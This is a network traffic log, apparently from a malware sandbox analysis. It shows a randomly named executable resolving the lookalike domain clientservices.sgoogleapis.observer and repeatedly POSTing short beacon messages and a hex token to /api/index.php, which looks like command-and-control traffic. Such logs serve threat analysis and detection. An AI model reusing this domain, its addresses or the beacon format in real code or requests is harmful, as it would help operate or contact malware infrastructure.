Jan 8, 2025 08:47:48.743391991 CET	50078	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:48.743695974 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:48.748493910 CET	80	50078	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:48.748508930 CET	80	50079	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:48.748548985 CET	50078	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:48.748584986 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:48.748728991 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:48.753490925 CET	80	50079	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:49.371973038 CET	80	50079	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:49.372061014 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.885447979 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.885792017 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.890353918 CET	80	50079	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:50.890409946 CET	50079	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.890598059 CET	80	50080	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:50.890664101 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.890877008 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:50.895654917 CET	80	50080	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:51.539683104 CET	80	50080	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:51.542665005 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.243536949 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.244097948 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.248490095 CET	80	50080	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:53.248536110 CET	50080	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.248948097 CET	80	50081	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:53.249176979 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.249902964 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:53.254657984 CET	80	50081	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:53.871049881 CET	80	50081	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:53.873732090 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.385744095 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.386121035 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.390769005 CET	80	50081	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:55.390846014 CET	50081	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.390933037 CET	80	50082	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:55.391000986 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.391611099 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:55.396397114 CET	80	50082	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:56.047641039 CET	80	50082	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:56.047729969 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.680730104 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.680733919 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.685487986 CET	80	50083	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:57.685568094 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.685745955 CET	80	50082	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:57.685775042 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.685884953 CET	50082	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:47:57.690521002 CET	80	50083	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:58.309581041 CET	80	50083	104.21.80.1	192.168.2.5
Jan 8, 2025 08:47:58.314738989 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.914637089 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.915019035 CET	50084	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.919595957 CET	80	50083	104.21.80.1	192.168.2.5
Jan 8, 2025 08:48:00.919675112 CET	50083	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.919856071 CET	80	50084	104.21.80.1	192.168.2.5
Jan 8, 2025 08:48:00.919967890 CET	50084	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.920124054 CET	50084	80	192.168.2.5	104.21.80.1
Jan 8, 2025 08:48:00.924881935 CET	80	50084	104.21.80.1	192.168.2.5
Jan 8, 2025 08:48:01.581615925 CET	80	50084	104.21.80.1	192.168.2.5
Jan 8, 2025 08:48:01.581677914 CET	50084	80	192.168.2.5	104.21.80.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 08:43:56.042383909 CET	50561	53	192.168.2.5	1.1.1.1
Jan 8, 2025 08:43:56.056834936 CET	53	50561	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 08:43:56.042383909 CET	192.168.2.5	1.1.1.1	0xf0a1	Standard query (0)	clientservices.sgoogleapis.observer	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 08:43:56.056834936 CET	1.1.1.1	192.168.2.5	0xf0a1	No error (0)	clientservices.sgoogleapis.observer	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

clientservices.sgoogleapis.observer

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:43:56.091411114 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:43:56.733007908 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7KEOBbeh88yURHOW2Ie2KBvkXUgJljd8kzZ4nrYnbftKZrKwqWdqnEcVXwJZQDF0HP8iC9kNMiZmF4myB%2BqedBllfuBbcnHhRAmiZSY2L%2BGQs3p%2F1lFUVUSgRTL6KwODXB7QcHDHnPxber%2FzyaK7nO6UMTafw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f3a1e25c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1530&rtt_var=765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:43:58.246392965 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:43:58.904522896 CET	824	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2dKIE86aOMKaG1%2FanKndbIWr9RadBh3dxrH%2Fe3BvXN%2BTwhmWVh1SdcHjKuKYfhAXMXtgA2diwgBK4zE03AsyJi3NgWgGaKQI3BFjJYMFJ2AcafxJZKqfJ6hDb7GkLuiSSm24a4ptdL%2BIs3saCnFGQepzgrSuEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f47afe87d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2029&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:00.527575016 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:01.172691107 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWIyo%2BNfh3zctzEohbv9SrVrr%2FvEWT07AW6LWeIjIafIBM3vp61xMHWXduClkZ5r7ZII%2Fyer359THYZn0l3%2F5FX4Kzb8YwsPosn1eUPc8OIXI6G1zn8dIz3rUtzKNxf09nMkl2NYh%2Bcz8pyZ2wjS9ZINLB4gdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f55eb317d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1955&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:02.683852911 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:03.345909119 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDOFtEFmaRxuvKMnBVhwVU1C3rb6MkjpGknBqc8IFtC5yAk1NvcOViGptI78drMgGyeM%2BcvrOu0eV%2BCj4%2BTIyRNx4ZwtgnAWQ0rXlOfKYTx9nYuN20zs0YO8RmWJI7rF97ZzC0mI13z2sCExVbgekg1pezdngA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f636f5b42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:04.984251976 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:05.633984089 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AByX4fAT6GmNnOko7BW7pVAC3jW3fagkZojyUGLTpTf1P0O25nkR85c6iREyn1sRw8z65YqT6Yawsh8eGcn5ElGRjlZ4ePYIvDTuJ1fCYeN4LonZN00tNUqjCzTVz9yajP2NP97J9InDHU0Tk5pktBqyda0RIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f71bc0a8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:07.159228086 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:07.822917938 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XS%2FsuIyJmf9aUnvZp9mtYuTK3LBE%2BheeBkIrKOqteo7CKy4kMCZhgZEsFHO2rjQ22gHgJccrdr0A01ufQZP0HR9jHuzEbT08BUX99IccfmwO7V9bzlk9V%2FeOBpAtK7gWp%2BHT0ojtyuNynNVUic4UBoMIubVC9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f7f58b9c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:09.451776028 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:10.073746920 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOSXYuBgRLbySnmBC6gKbUhPEh%2F85VcJnTGI4Q8qLd3nmCvjto%2BqxzMiTg3yst8Vi9vsayX1R10BxbDmBYe41PCqhxbnfh0t%2B4DgNABjddAzoaKRHUNgVXbl3sq%2BTe62y%2Bw%2B9LVqXD0oPi5wK1vi8Sjp9%2BCfWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f8d9ca142d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:11.590373993 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:12.233028889 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1H87wqruF1Ty2qPlnTCFkaJkKVmuCltOn6YHjK1TgHw%2F1WSk3ciMgROMVUQRySUyc4b7taXFgQW%2BAta6999Xbkigqqygx%2BAilVwI2VDZUyoZrTnsrL9Uq2NnQu9PuZCV9nuDMxjSMJPSrO41s4aE5TD3IA88g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8f9afaf40f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49716	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:14.074604988 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:14.698978901 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TS7INSBu9vFAbAEpudukE%2BvekWQZUE63NGSKiYyqP8aGdtXzmAhSNZpgFxSiE7buGMitXY6rjdrziKgJMDxoWeOvl97TIMYrsi3CyIzeSP0zAmspUkYMemLJMyfH1H8XBPxpvpwp4%2BgsfKWGZXnVSd9cEPzm2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8faa7db242d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49719	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:16.217458963 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:16.848417997 CET	831	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3wjccifbJkRom35YKHfKq1l40xDuoBvYtlVk%2FGLKBtmrKnry4196U%2FS8ImfLDgBHs82PwU3mV9b%2Fn0%2BJ%2BmYcfzkvP%2BRGTMI1FvEqqPHXAyI5PrmKZK%2BjYPp5ag8IdSYnCLeN2Sc8IB7fea%2FvLkI5tImcH2mnQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8fb7de987d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49733	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:18.480537891 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:19.118756056 CET	811	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Qke7oxSH0fuYD8W%2B7cDxhotgpXnB4mjVuA73w9oQUWN2KLuiNA0JB0SG0U0ddtzvgxc5DuLjXXV1c0YB3uAdS8Quwohe0A7uGuHuk0tWzlZxlECgH9REmhbYq650RuXk8H5oH8Y5x8qymLMFSq8vhXKoetmOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea8fc6190f7d0e-EWR server-timing: 